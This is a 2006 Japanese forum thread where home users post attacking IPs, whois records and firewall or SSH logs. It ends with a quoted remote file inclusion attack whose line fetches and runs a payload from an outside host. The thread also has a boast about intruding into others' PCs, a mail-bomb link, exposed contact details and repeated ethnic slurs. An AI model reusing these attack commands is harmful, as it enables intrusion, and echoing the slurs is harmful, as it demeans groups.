a. [IPネットワークアドレス] 203.216.224.0/19
b. [ネットワーク名] YAHOO-NET
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corp.
m. [管理者連絡窓口] TT9944JP
n. [技術連絡担当者] TT9944JP
p. [ネームサーバ] dnsg01.yahoo.co.jp
p. [ネームサーバ] ns10.yahoo.co.jp
[割当年月日] 2005/03/03
[最終更新] 2005/12/21 17:32:02(JST)

上位情報
----------
株式会社ブロードバンドタワー (BroadBand Tower, Inc.)
[割り振り] 203.216.192.0/18

下位情報
----------
該当するデータがありません。

厨な質問でごめんなさい
203.216.192.0/18とは、203.216.192.0から203.216.255.255までの範囲
の事と理解していいでしょうか？
スラッシュから後の数字、例えば上記の/18←はどういう意味なんですか

あるエロサイトをクリックしたらワンクリック系で
それ以来「HyperText 転送プロトコル (HTTP)」で
数分おきに「警告」の画面が出てくるんですけど、
ブロックする方法教えてください。
初心者ですみませんが宜しくお願いします。

>>488-489
セキュリティ初心者質問スレッドpart66
http://pc8.2ch.net/test/read.cgi/sec/1137657121/

TCP SYN FLOOD攻撃
2006/01/23 02:01:12 - 2006/01/23 02:07:36
25回
IPアドレス 218.40.56.3

Jan 24 01:31:25 *** sshd[17904]: Did not receive identification string from 61.193.184.72
Jan 24 01:34:11 *** sshd[17905]: input_userauth_request: illegal user mata
Jan 24 01:34:11 *** sshd[17905]: Failed password for illegal user mata from 61.193.184.72 port 48500 ssh2
Jan 24 01:34:11 *** sshd[17905]: Received disconnect from 61.193.184.72: 11: Bye Bye
Jan 24 01:34:11 *** sshd[17906]: input_userauth_request: illegal user sato
Jan 24 01:34:11 *** sshd[17906]: Failed password for illegal user sato from 61.193.184.72 port 48538 ssh2
Jan 24 01:34:11 *** sshd[17906]: Received disconnect from 61.193.184.72: 11: Bye Bye

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.193.184.64/27
b. [ネットワーク名] CMS-JAPAN
f. [組織名] シー・エム・エス・ジャパン株式会社
g. [Organization] CMS Japan K.K.

Pネットワークアドレス
210.172.0.208/28
ネットワーク名
IR-NET
組織名
有限会社インターライズ
Organization
Inter Rise Inc.
管理者連絡窓口
FS533JP
技術連絡担当者
FS533JP
ネームサーバ
割当年月日
2004/10/07
返却年月日
最終更新
2004/10/13 10:34:02(JST)
上位情報
ソニー株式会社 (SONY Corporation)
割り振り
210.172.0.0/19
ビットドライブ (bit-drive)
SUBA-330-041 [ SUBA ] 210.172.0.0
下位情報
該当するデータがありません。

なにがしたいねん？

あぁ、なんか知らんうちにwinstallっていうファイルがあるし…。

IPアドレス 220.102.221.249
ホスト名 FLA1Afd249.tky.mesh.ad.jp
IPアドレス
割当国　※ 日本 (JP)
都道府県 東京都
市外局番 --
接続回線 xDSL

いい加減にしろ

ホスト名からＩＰアドレスを調べるサイト等はありますか？

ある

61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92

>>496
『ＩＰ検索』とぐぐれば出てくる

とりあえず、ドメイン覚えてるから変な事したら通報するぉｗｗｗ
誰に言ってるのかは分かってるだろうけど。

>>499
希望する内容のサイトがありました。ありがとうございました。
「ホスト　ＩＰ」等でぐぐっても出てこなかったのに・・・

うちのルータ
リモートホスト出ないからめんどい

最近ルーター導入して、ファイアウォール通知する設定したら不正アクセスの多さにビックリしたよ…。
ところでそのアクセスの種類なんだけど、

・不正なパケット
・TCP SYN FLOOD攻撃
・ポートスキャン
・SMURF攻撃
・IP SPOOFING攻撃
・LAND攻撃
・UDPポートループバック攻撃

どういう攻撃なのかさっぱりわからんので、解説お願いできないでしょうか？
解説サイトでも全然ＯＫですので。

初心者は調べなくても質問していいとでもお思いでしょうか？
そのままググってみてそれでもわからなければまた来てください

http://www.f-day1.net/
こいつからスパムが毎日送られてくる。

Whois 219.239.208.72
e-mail: [email protected],[email protected]
http://www.datadragon.net/Contact_us.html
Email(Service): [email protected]
Email(Sales): [email protected]
Email(Marketing): [email protected]

これらのメールアドレスに苦情メールを送っても
すべてエラーで戻ってくる。

[email protected]　[email protected] [email protected]
[email protected]　[email protected] [email protected]
で送っても全てエラーで戻ってくる。

データドラゴン（中国）の生きているメールアドレスを知っている方
教えてください。

>>505
苦情メールって効果あるの？逆効果じゃないか？

http://marimo.org/spamlist.html
拒否るか、プロバイダとか、あらゆる権力動かして止める。
国内なら、多少は法律あるから対処可能だろうけどさ。
海外とか、経由してたりすると難しいんじゃね？

そもそも、自鯖なのかどうかでもだいぶ違ってくるような・・・
可能なら、自分のアドをでかいメールで埋めて許容限界にしておいて、
受け取れねーよ。を返させるぐらいしか思いつかん。

192.168.11.1
↑ウイルスバスター2005がパトロールした結果こいつが出てきた

初歩的なことで申し訳ないんだけど、どういう状況なのか教えて欲しいッス
俺のMYPC覗かれてんの？

ってかこういう場合どうすればいいの？

ネタはよそでやれ。

いやネタじゃなくてガチ
サーチしても引っかからないからちょっち心配

>>509
コマンドプロンプト開いてipconfigってやった時にデフォルトゲートウェイに192.168.11.1とか書いてあったら怒るよ

IP: 218.46.162.128
DNS: EATcf-515p128.ppp15.odn.ne.jp

コマンドプロンプトさえ分からないので初心者スレ行ってきます

>>510
それって自分のIPが出るんじゃねーの？　って事？

221.25.28.7

xmas scan　うぜー

Name: softbank221025028007.bbtec.net
Address: 221.25.28.7

まーだ続けんのかよ　うぜーな

133.205.239.65,3211
Trojan送りつけるのって犯罪だべ

こいつらうざい
2006/01/27 00:15:14 softbank218126078033.bbtec.net(218.126.78.33)
2006/01/27 00:15:25 211.204.130.43(211.204.130.43)
2006/01/27 00:17:12 OTUfb-01p2-5.ppp11.odn.ad.jp(219.66.179.5)
2006/01/27 00:17:28 bf-125.smn.enjoy.ne.jp(210.141.59.253)
2006/01/27 00:18:57 ZM041181.ppp.dion.ne.jp(222.8.41.181)
2006/01/27 00:19:16 ipvr5.csie.ncu.edu.tw(140.115.156.195)
全て TCPポート1563

この中で実際ハッキングされた奴いてる？
何か目に見える様なことされた？

“【電凸】ワンクリ総合スレ【http://i.pic.to/5wat4】”
http://ex14.2ch.net/test/read.cgi/news4vip/1138234319/

誰かﾀｼｹﾃ(;'A`)兵士と知識が足り茄子

UDPポート 33436 のアタック しつこい
2006/01/27 17:31:57 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236)
2006/01/27 17:38:34 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236)
2006/01/27 17:38:39 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236)
2006/01/27 17:38:43 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236)
2006/01/27 17:38:48 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236)
2006/01/27 17:38:53 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236)

俺と同じように不正アクセスされてるおまいらをみてなんか嬉しいよ・・・ヽ(`Д´)ﾉｳﾜｧｧﾝ

こないださP2PやらFTP使ってる輩のPCに進入したんだが
それを知ったご当人が顔真っ赤にして「訴える」とかやたら勢い込んでるんだが
普通に考えて無理だわなｗ
それどころかそいつ自身P2P使用について罪に問われるんじゃないか？
そもそもそいつにもマシンにも実害自体は与えてないしｗ

>>522お前って奴は・・・・・・・

メールボム
http://www.geocities.jp/daramomail/mail.htm

エロ広告サイト
http://hoppy-happy.selfip.info/new/kbt04/

↓業者メールアドレス
[email protected]
[email protected]

>>523
ん？なに？

俺は正直迷惑メールのメアドを晒したいがスレ違いだ

>>525なにもいじらなかったとしても本人の気持ちを考えろってことを言いたかった

進入しただけでも積荷は問われるんじゃなかったっけ？

222.170.114.149
IPアドレス 222.170.114.149
ホスト名 対応するホスト名がありません
IPアドレス
　割当国　※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

219.147.192.118

IPアドレス 219.147.192.118
ホスト名 対応するホスト名がありません
IPアドレス
　割当国　※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92
61.46.139.92

ここうぜーーーーーー

210.236.186.119
222.10.186.94
死ね！！

219.111.127.64 さっきアクセスされたので晒しあげ

61.124.202.87

鬱陶しい輩だが、国内のしかも同じプロバイダのIPだった。
よってこいつを単体でアクセス制限

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 203.141.32.0/20
b. [ネットワーク名] YAHOO-NET
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corp.
m. [管理者連絡窓口] TT9944JP
n. [技術連絡担当者] TT9944JP
p. [ネームサーバ] dnsg01.yahoo.co.jp
p. [ネームサーバ] ns10.yahoo.co.jp
[割当年月日] 2003/02/07
[最終更新] 2005/12/21 17:56:04(JST)
上位情報
----------
株式会社ブロードバンドタワー (BroadBand Tower, Inc.)
[割り振り] 203.141.32.0/19
下位情報
----------
該当するデータがありません。
Contact Information: [担当者情報]
a. [JPNICハンドル] TT9944JP
b. [氏名] 橘 俊男
c. [Last, First] Tachibana, Toshio
d. [電子メイル] [email protected]
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corporation
k. [部署] システム統括部サイトオペレーション
l. [Division] Site Operations
o. [電話番号] 03-6440-6000
p. [FAX番号] 03-6440-6265
y. [通知アドレス] [email protected]
[最終更新] 2004/06/01 17:35:02 (JST)
[email protected]

Pアドレス 219.28.108.65
ホスト名 softbank219028108065.bbtec.net
IPアドレス
　割当国　※ 日本 (JP)
都道府県 兵庫県
市外局番 --
接続回線 xDSL

>>421
IPの末尾が１だったら
TCPポート1563
とか
>520 のようなアクセスが来るらしい

現在は末尾１じゃないから TCP:1563とか>520 のアクセス来てない

220.219.199.249

延々と叩いてくるの勘弁して下さい

IPアドレス 69.28.181.55
ホスト名 対応するホスト名がありません
IPアドレス
　割当国　※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

58.138.16.99

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 58.138.0.0/18
b. [ネットワーク名] PPP-EXCITE
f. [組織名] エキサイト株式会社
g. [Organization] Excite Japan Co., Ltd.
m. [管理者連絡窓口] EK861JP
n. [技術連絡担当者] JF254JP
p. [ネームサーバ] ns00.cdn-japan.com
p. [ネームサーバ] ns01.cdn-japan.com
[割当年月日] 2005/05/26
[最終更新] 2005/05/26 10:47:07(JST)

上位情報
----------
株式会社インターネットイニシアティブ (Internet Initiative Japan Inc.)
[割り振り] 58.138.0.0/17

死ね

あなたが検索されたアドレス［ 222.149.131.222 ］のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 222.149.128.0/18
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [管理者連絡窓口] AY1361JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] IM657JP
p. [ネームサーバ] ns-kg001.ocn.ad.jp
p. [ネームサーバ] ns-kn001.ocn.ad.jp
[割当年月日] 2004/03/04
[最終更新] 2004/03/04 10:22:05(JST)

上位情報
----------
エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION)
[割り振り] 222.144.0.0/13

219.129.21.116

支那かららしいが何度も何度もいい加減にしてくれよと…。

>>541
それこっちにも来てるよ。

IPアドレス 220.102.188.1
ホスト名 FLH1Abi001.osk.mesh.ad.jp

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 220.102.0.0/16
b. [ネットワーク名] BIGLOBE-9
f. [組織名] BIGLOBEサービス(日本電気株式会社)
g. [Organization] NEC Corporation
m. [管理者連絡窓口] NK032JP
n. [技術連絡担当者] MK11728JP
p. [ネームサーバ] ns02.mesh.ad.jp
p. [ネームサーバ] ns03.mesh.ad.jp
[割当年月日] 2004/04/06
[返却年月日]
[最終更新] 2004/04/06 18:53:06(JST)

上位情報
----------
日本電気株式会社 (NEC Corporation)
[割り振り] 220.102.0.0/16

下位情報
----------
該当するデータがありません。


頼むから氏んでくれ

60.238.82.63
↑厨のIP

IPアドレス 70.86.55.218
ホスト名 mail.symb0l2watch.com
IPアドレス
　割当国　※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

220.146.188.45

検索結果
IPアドレス 219.171.28.160,2856
ホスト名 softbank219171028160.bbtec.net
IPアドレス
　割当国　※ 日本 (JP)
都道府県 宮城県
市外局番 --
接続回線 xDSL

221.14.246.237　　 2006/02/01 17:55:19 - 2006/02/04 15:19:30 　130回

チャンコロまじうぜえ

221.14.246.236
221.14.246.235
221.14.246.254
221.14.246.226
221.14.246.229
221.14.246.228
221.14.246.230

>>548-549
あーうちだけじゃないんだなぁ。
これで弾こう。

221.13.128.0 - 221.15.255.255

221.5.251.195
中華人民共和国

sshdが刺激されました。（ログはnlでカウント付き）
国内から馬鹿なことするなよ。

1 Feb 4 03:34:46 hostx sshd[9376]: Illegal user a from 61.213.76.189
2 Feb 4 03:34:47 hostx sshd[9379]: Illegal user b from 61.213.76.189
（中略）
1500 Feb 4 04:15:53 hostx sshd[14574]: Illegal user Owner from 61.213.76.189
1501 Feb 4 04:15:53 hostx sshd[14577]: Illegal user goober from 61.213.76.189

j076189.ppp.asahi-net.or.jp

シナチクIPリスト

ttp://up2.viploader.net/mini/src/viploader8712.txt.html

219.146.78.59

チャンコロいいかげんにせいよ！

218.163.130.210:2061
218.163.130.210:24087

サービス: Windows ファイル共有
ポート: 139
モード: TCP
IP アドレス: 61.121.33.16
ホスト名: ntmiex005016.miex.nt.isdn.ppp.infoweb.ne.jp

毎日来る。
そして今日はとてつもなくしつこい、、、、、、、、

2006/02/05 23:38:26 TCP 80 221.117.59.154(221.117.59.154)
2006/02/05 23:38:27 TCP 1080 221.117.59.154(221.117.59.154)
2006/02/05 23:38:28 TCP 3128 221.117.59.154(221.117.59.154)
2006/02/05 23:38:29 TCP 8080 221.117.59.154(221.117.59.154)
2006/02/07 09:47:37 TCP 80 221.117.59.154(221.117.59.154)
2006/02/07 09:47:38 TCP 1080 221.117.59.154(221.117.59.154)
2006/02/07 09:47:39 TCP 3128 221.117.59.154(221.117.59.154)
2006/02/07 09:47:40 TCP 8080 221.117.59.154(221.117.59.154)

http://8701.teacup.com/myuuru/bbs

2006/02/08 23:32:42通信の要求　210.239.148.89　TCP(1746)

Domain Information: [ドメイン情報]
a. [ドメイン名] BEAUTECHLAB.CO.JP
e. [そしきめい] かぶしきがいしゃびゅーてっくらぼ
f. [組織名] 株式会社ビューテックラボ
g. [Organization] BeautechLab Corporation
k. [組織種別] 株式会社
l. [Organization Type] Company
m. [登録担当者] IM269JP
n. [技術連絡担当者] HI3229JP
n. [技術連絡担当者] RS006JP
p. [ネームサーバ] blc.beautechlab.co.jp
p. [ネームサーバ] blcsv9x.beautechlab.co.jp
p. [ネームサーバ] ns1.bit-drive.ne.jp
[状態] Connected (2006/11/30)
[登録年月日] 1999/11/26
[接続年月日] 1999/11/30
[最終更新] 2005/12/01 01:12:20 (JST)

なんの用だ

あごめん
全部張っちゃったorz

IPアドレス 220.109.20.140
ホスト名 i220-109-20-140.s02.a017.ap.plala.or.jp
IPアドレス
割当国　※ 日本 (JP)
都道府県 石川県
市外局番 --
接続回線 xDSL

IPアドレス 210.159.149.164
ホスト名 PPPbm1164.tokyo-ip.dti.ne.jp
IPアドレス
割当国　※ 日本 (JP)
都道府県 東京都
市外局番 --
接続回線 光

softbank221029031024.bbtec.net

IPアドレス 221.187.59.179
ホスト名 p4179-ipbf17souka.saitama.ocn.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 埼玉県
市外局番 --
接続回線 光

　しつこい。

--:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.89.162:3261 -> **.***.**.**:135)
--:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.89.26:1341 -> **.***.**.**:135)
--:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.89.26:1341 -> **.***.**.**:135)
--:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.45.49:3777 -> **.***.**.**:135)
--:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.117.73:1428 -> **.***.**.**:135)
--:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.45.49:1574 -> **.***.**.**:135)
--:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.89.104:4394 -> **.***.**.**:135)

送信日時　2006-02-11 02:45:27
送信日時　2006-02-11 02:45:30

IPアドレス 210.157.21.152
ホスト名 unused-210-157-021-152.interq.or.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

>>566
あんたのＩＳＰは eonet.ne.jp だろ

IP：218.183.240.109
:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)

softbank218122214010.bbtec.net

PC初心者たくさん居るスレはこのスレですか
晒す前にもっとNWについて勉強しようね＾−＾

PC上級者ｷﾃﾀ Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒(｡A｡)!!!

ttp://www.dshield.org/

1026って、Messenger Spam狙い？
発信元を偽装しているかもしれないけど中国方面からのものがコンスタントに来るね。
鬱陶しいからTCP445と135と一緒にUDP1026と1028のログは取らないようにしたら
ものすごく静かで驚くw

パソコンの電源を切ってる時にもルータのアクセスランプがピカピカ点滅する時があるんですが、これって不正進入されかけてるのかなぁ？

>>574
そのルータがモデムルータならその機器自体がWAN側IP取っていて
そのWAN側IPに対して侵入を試みようとしてきてるだけでしょ。
通常ならルータは必要ないものは閉じてるから点滅してても無視するだけでいい。
PCが動いていても必要なもの以外のポート開けやDMZホストに指定しなければ問題ない。

>>575
書き忘れましたが、モデムルータです。
よって、WAN側IPは確かに常に持ってますよ。(電源入れてる間は)

やっぱりルータまでのアクセスはされるもんなのですね。ご回答ありがとうございました。

中国、韓国、台湾、香港、イタリア、オランダ、メキシコ、ブラジルがUzeeeeeeee!!

中国はホントダメだね

あなたが検索されたアドレス［ 59.158.170.134 ］のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 59.158.170.128/29
b. [ネットワーク名] HG0004230405
f. [組織名] broadgate
g. [Organization] broadgate
m. [管理者連絡窓口] AT047JP
n. [技術連絡担当者] AT047JP
p. [ネームサーバ]
[割当年月日] 2005/07/26
[最終更新] 2005/07/26 14:29:31(JST)

上位情報
----------
株式会社ユーズコミュニケーションズ (U's Communications Corp.)
[割り振り] 59.158.0.0/15
株式会社ユーズコミュニケーションズ (U's communications Corp.)
SUBA-468-0JK [SUBA] 59.158.170.0/24

あぼーん

あなたが検索されたアドレス［ 220.146.130.229 ］のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 220.146.0.0/16
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [管理者連絡窓口] KH071JP
n. [技術連絡担当者] TK13654JP
n. [技術連絡担当者] KN6902JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns3.hyper.web.ad.jp
[割当年月日] 2003/11/14
[最終更新] 2003/11/20 16:45:03(JST)

上位情報
----------
富士通株式会社 (FUJITSU LIMITED)
[割り振り] 220.146.0.0/15

Whois全部貼ってるおまえ
ウザいから書き込むな！

[技術連絡担当者]とか「上位情報」とかをNGワードにしてあぼ〜んしとけよ
若しくはこのスレ自体見るな
おまえいなくてもまったく困らんから

IPアドレス 66.97.133.101
ホスト名 66-97-133-101.viawest.net
IPアドレス
　割当国　※ アメリカ合衆国 (US

トロイの木馬
61番ポートを狙ってきた。

ここ見て、初めてルーターのログみたんだけど、結構アクセスしてるんだね
南米、中国がわりとあった。
スパム攻撃して楽しいのかな

PCがあっても、たいして他に何もすることねーんじゃね？
それか、馬鹿だからゾンビとか、踏み台なりまくりんぐに気付かないっぽい
ま、中韓は国策の反日教育の影響だろうけどなw

すみません。ここにあるような不正アクセスされたとして、どんな対策をすれば良いんでしょうか？
ファイヤーウォール使ってれば、放っておいても問題ないの？

>>587
こういうアクセスがあったよ。でも止めたよ。
っていう事をお知らせしてるだけだから気にする必要はない。

>>588
ありがとうございます。
ここ２、３日ファイヤーウォールが急に反応するようになったのですが、
ググってもなんだか難しくてよく分からなかったもので・・・

169.254.239.240

219.182.185.1からアクセスが来てるってファイアウォールのメッセージが出続けてます。
何とかならないでしょうか？

61.121.33.19 ntmiex005199.miex.nt.isdn.ppp.infoweb.ne.jp

>>591
メッセージを非表示にすればいい。

ルーターのログ見ると5秒おきくらいにTCP port 135や445にいろいろなところからアクセスがくるんですけど
多すぎますかね？ファイヤーウォール無しなので心配。

>>594
ルータに弾いたとログが残ってるなら問題ないと思う。

IPアドレス 203.250.33.116
ホスト名 pc033116.cataegu.ac.kr
IPアドレス
　割当国　※ 該当なし
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

>>595
ありがとうございます。どうやらルーターが弾いているようなので一安心です。
それにしてもまさかこんなに来てるとは…

IPアドレス 210.157.21.152
ホスト名 unused-210-157-021-152.interq.or.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

219.146.0.0-219.147.31.255
CHINATELECOM-sd
Wang guang
[email protected]
+86-10-58501724

60.39.125.171

211.212.0.0-211.215.255.255
HANANET
チョン
Ihyup Sung
+82-2-106 ←今すぐtel！

211.212.15.0-211.215.15.255
HANANET-INFRA-KR

シナチクうぜー！

211.147.243.0-211.147.248.255

>>461で晒されてるのが最近毎日攻撃ｳｻﾞイ
しね！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！

>>461の
tiger505.maido3.comってmaido3.comは
この2chの借りてる鯖のはずだと思ったけど。
http://server.maido3.com/
http://maido3.com/
2ch見るとそれ働くとかそういうのじゃない？
本当に攻撃してるならﾃﾗﾜﾛｽだけどｗ

今後に期待age

また461ネタか

あぼーん

ttp://pc7.2ch.net/test/read.cgi/mac/1137478058/l50より

378 名前： 名称未設定 Mail： chousentekitaidodehagesikuage 投稿日： 2006/02/22(水) 01:41:07 ID： //uNr7gZ0
http://oresama.hopto.org/〜sheel/directory/

おまいらのスキルとやらでこのサーバを突破してください。
俺様のスキルと、おまいらのスキルと、どっちが上かこれではっきりさせてあげよう。

ちなみに言っておくけど、逆襲食らわないように
IPアドレスくらい隠してねw
それと突破方法もばれないようにしてねw
User-Agentくらいもばれないように小細工してねw
80番ポートくらいは閉じてからアクセスしようねw

inetnum:202.127.144.0-202.127.159.255
netname:WHCAS-CN
descr:chines Academy of Science, Wuhan Branch
descr:Wuhan Institute of Pysics
descr:Wuhan,Hubei 430071
country:chankoro
admin-c:LH90-AP
tech-c:LH90-AP
mnt-by:MAINT-CNNIC-AP
changed:[email protected] 20010329
statas:ALLOCATED PORTABLE
source:APNIC

person:Li Hong
nic.hadl:LH90-AP
e-mail:[email protected]
address:No4,Zhongguancun 4th South Street,Haidian District, Beijing
phone:+86-10-58812000
fax-no:+86-10-58812900
country:chankoro
changed:[email protected] 20041109
mnt-by:MAINT-CN-LIHONG
source:APNIC

IPアドレス 202.83.135.35
ホスト名 対応するホスト名がありません
IPアドレス割当国　※ 日本 (JP)

219.182.184.128

さっきからIPを変えつつ叩いてくる輩がいる・・・うぜー

IP変えてって・・・

222.149.193.128

ほんと中国多いな

125.52.33.184
125.52.33.184
125.52.33.184

203.211.254.55

IP Address 220.171.28.74
Network CHINANET-XJ
Location China
Province network CHINANET xinjiang
+86-10-58501724

LI ZHAO
+86-991-5820832

59.34.196.37
61.145.112.142

すげー回線の調子悪いと思って、
ルーターのログ見たら・・・
同じプロバイダーのIPの近い奴に、
凄まじい勢いでポート80叩かれてたorz
もちろんルーターが弾いてくれてたから、
侵入とかはなかったけど・・・
なんなんだよあいつは・・・

恐ろしいな

>>620
php狙い

IPアドレス 206.223.150.96
ホスト名 対応するホスト名がありません
IPアドレス
　割当国　※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

アメリカウザイ

ちなみにヒット数は10

またアメリカから
ヒット数5

IPアドレス 65.54.194.118
ホスト名 対応するホスト名がありません
IPアドレス
　割当国　※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

59.85.21.159
59.85.24.225
59.85.15.197
59.85.14.36

219.180.242.40
220.209.205.16

今日はさらにひどい・・・

61.213.191.200　日本
207.68.178.61　アメリカ
219.166.142.212　日本（福井）
61.236.229.19　中国
60.190.23.156　中国

しかしホント中国多いな

こんな場末に晒してなんか意味あんのかね？
警察に通報した方がまだ有意義と思うが。

2006年2月27日 18:15:58 Unrecognized access from 43.244.85.117:4467 to TCP port 445
2006年2月27日 18:16:01 Unrecognized access from 43.244.85.117:4467 to TCP port 445
2006年2月27日 18:20:17 Unrecognized access from 43.244.105.92:1637 to TCP port 445
2006年2月27日 18:20:20 Unrecognized access from 43.244.105.92:1637 to TCP port 445
2006年2月27日 18:20:30 Unrecognized access from 43.244.240.16:1982 to TCP port 445
2006年2月27日 18:20:33 Unrecognized access from 43.244.240.16:1982 to TCP port 445
2006年2月27日 18:20:58 Unrecognized access from 43.244.240.16:3607 to TCP port 139
なんで、こんなに来るのか？

↑
aol.co.jpに問い合わせしたら？

132.248.202.37　メキシコ

おまえら、本屋に売ってる
「ハニーポットなんちゃら」
って本はもう読んだか？

207.46.216.42　アメリカ　←毎日しつこい。
221.112.20.67　日本
65.54.194.118　アメリカ

12.120.13.25　アメリカ
65.54.194.118　アメリカ

さっきからIP変えつつ叩いてくる奴がいる。
219.103.130.30　日本　2006/02/28 21:23:03 - 2006/02/28 21:31:35　ヒット数56
219.103.130.29　日本　2006/02/28 21:23:03 - 2006/02/28 21:31:35　ヒット数94
65.216.116.114　アメリカ

今日やたら多い、ウゼー

ヒット数94て・・・

IPAに通報しますた

具体的にどうやって通報したらいいの？< IPA

https://isec.ipa.go.jp/inq/servlet/InqMainServlet?id=index&gamenFlg=4
↑から通報した

Tnx!

なんかもうアクセス制限かけるのが面倒になってしばらく放置してる

220.219.114.22

IPアドレス 220.219.114.22
ホスト名 ntszok045022.szok.nt.ftth.ppp.infoweb.ne.jp
IPアドレス
割当国　※ 日本 (JP)
都道府県 静岡県
市外局番 --
接続回線 光

60.46.92.2

IPアドレス 60.46.92.2
ホスト名 p5002-ipad302sasajima.aichi.ocn.ne.jp
IPアドレス
割当国　※ 日本 (JP)
都道府県 愛知県
市外局番 --
接続回線 xDSL

IPアドレス 125.193.92.164
ホスト名 FLH1Adr164.hyg.mesh.ad.jp
IPアドレス
割当国　※ 日本 (JP)
都道府県 兵庫県
市外局番 --
接続回線 光

IPアドレス 58.87.190.191
ホスト名 p57bebf.hkidnt01.ap.so-net.ne.jp
IPアドレス
割当国　※ 日本 (JP)
都道府県 北海道
市外局番 --
接続回線 光

61.129.49.125　国不明
12.120.37.21　国不明
65.216.116.114　国不明

inetnum: 221.5.128.0-221.5.255.255
netname: CNC GROUP-CQ
descr: CNC Group Chongqing province network
descr: China Network Communications Group Corporation
descr: No.156,Fu-Xing-Men-Nei Street,
descr: Beijing 100031
country: CN
admin-c: CH455-AP

>>647
>>1のNeoTrace Express使うよろし。
whoisからtracert、国とその国のどこの都市や地域から、
発信されたかまでわかる。

>>649
すぐ落ちてしまい、起動すら出来ない。

58.12.163.188から数千回にわたるSSHアタックが。
USENを利用している奴らしい。
mynetwatchmanでもすでに探知されてる。

リモートコードインジェクション攻撃来た・・。
しかもものの見事に200返してるし・・・

wldthng.nexcess.net "GET /thisdoesnotexistahaha.php HTTP/1.1" 404
wldthng.nexcess.net "GET /webcalendar/tools/send_reminders.php HTTP/1.1" 200 50 "-" ★
wldthng.nexcess.net "GET /cal/tools/send_reminders.php HTTP/1.1" 404
wldthng.nexcess.net "GET /Calendar/tools/send_reminders.php HTTP/1.1" 404
：
wldthng.nexcess.net "GET /webcalendar/tools/send_reminders.php HTTP/1.1" 200 ★
:
wldthng.nexcess.net "GET http://xxx.xxx.xxx.xxx//webcalendar/tools/send_reminders.php?
includedir=http://81.58.26.26/libsh/shit.txt?&cmd= HTTP/1.1" 200 1341 "-" "-"

最後の行でセキュリティーホール突かれてる・・。
http://81.58.26.26/libsh/shit.txt見ると、色々wgetしたり色々している。

-----------------------------------------------------
$SCWD = `wget http://81.58.26.26/libsh/ping.txt;mv ping.txt temp2006
;perl temp2006 213.25.56.61 3303････
-----------------------------------------------------

httpdのerrorlog見るともろ実行しているし・・。

--08:24:09-- http://81.58.26.26/libsh/ping.txt
=> `ping.txt'
Connecting to 81.58.26.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 358 [text/plain]
ping.txt: Permission denied

Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory.
Use -S to search $PATH for it.
：
：
sh: ./ping: No such file or directory
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

6 15808 6 1123 0 0 1660 0 0:00:09 --:--:-- 0:00:09 1660
curl: (23) Failed writing body
chmod: cannot access `ping': No such file or directory

